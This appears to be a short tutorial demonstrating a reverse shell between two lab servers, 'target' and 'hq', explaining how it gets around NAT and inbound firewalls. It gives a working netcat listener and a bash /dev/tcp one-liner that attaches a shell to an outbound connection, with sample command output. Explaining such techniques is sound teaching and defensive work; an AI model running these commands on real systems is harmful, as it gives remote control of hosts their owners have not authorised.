A reverse shell is achieved when you "send" a server's shell (in my demo the server is named target) to another server (hq in my setup). Instead of hq connecting in to target, target opens an outbound TCP connection to hq and attaches a shell to it.
Using this technique you can run commands on a server you cannot connect to directly (for example one behind NAT or an inbound firewall). The commands run with the privileges of the user who launched the shell on target, so they are root commands only if that user was root.
# open up a tcp port on the "hq" server to "receive" the reverse shell
$ nc -n -l -p 60001

# send the shell from the "target" server to the "hq" socket
# (10.20.30.40 is hq's address; /dev/tcp is a bash feature, so type this in bash, not sh;
#  >& sends stdout and stderr to the socket, 0<&1 reads stdin from the same socket)
$ nohup /bin/bash >& /dev/tcp/10.20.30.40/60001 0<&1 2>&1 &

# now on "hq" you can type any command into the nc session
hostname      # command sent for execution on the remote host
target        # output received from the command